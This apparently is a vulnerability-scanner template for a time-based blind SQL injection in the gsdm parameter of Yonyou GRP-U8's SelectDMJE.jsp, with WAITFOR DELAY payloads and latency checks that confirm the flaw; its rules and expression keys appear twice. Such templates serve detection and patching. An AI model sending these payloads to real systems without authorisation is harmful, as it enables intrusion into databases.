id: yonyou-grp-u8-selectdmje-sqli

info:
  name: 用友GRP-U8 SelectDMJE.jsp SQL注入漏洞
  author: ct
  severity: high
  verified: true
  description: |
    用友GRP-U8 < 202307
    在用友GRP-U8的SelectDMJE.jsp gsdm参数存在SQL注入漏洞，由于用友GRP-U8未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。 

rules:
  r0:
    request:
      method: POST
      path: /u8qx/SelectDMJE.jsp
      headers:
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
      body: |-
        gsdm=&kjnd=&userId=&xmdm=
    expression: response.status == 200
expression: r0()

rules:
  r0: 
    request: 
      method: POST    
      path: /u8qx/SelectDMJE.jsp
      body: gsdm=';WAITFOR DELAY '0:0:0'--&kjnd=&userId=&xmdm=
    expression: |
      response.status == 200
    output: # 捕获网站原始响应延时
      t0: response.latency
  r1:
    request: 
      method: POST    
      path: /u8qx/SelectDMJE.jsp
      body: gsdm=';WAITFOR DELAY '0:0:5'--&kjnd=&userId=&xmdm=
    expression: | # 时间盲注5秒后网站的响应延时 - 网站原始响应延时 > 4500ms
      response.status == 200 &&
      response.latency - t0 >= 5 * 1000 - 500 
  r2:
    request: 
      method: POST    
      path: /u8qx/SelectDMJE.jsp
      body: gsdm=';WAITFOR DELAY '0:0:3'--&kjnd=&userId=&xmdm=
    expression: | # 时间盲注3秒后网站的响应延时 - 网站原始响应延时 > 2500ms
      response.status == 200 &&
      response.latency - t0 >= 3 * 1000 - 500
expression: r0() && r1() && r2()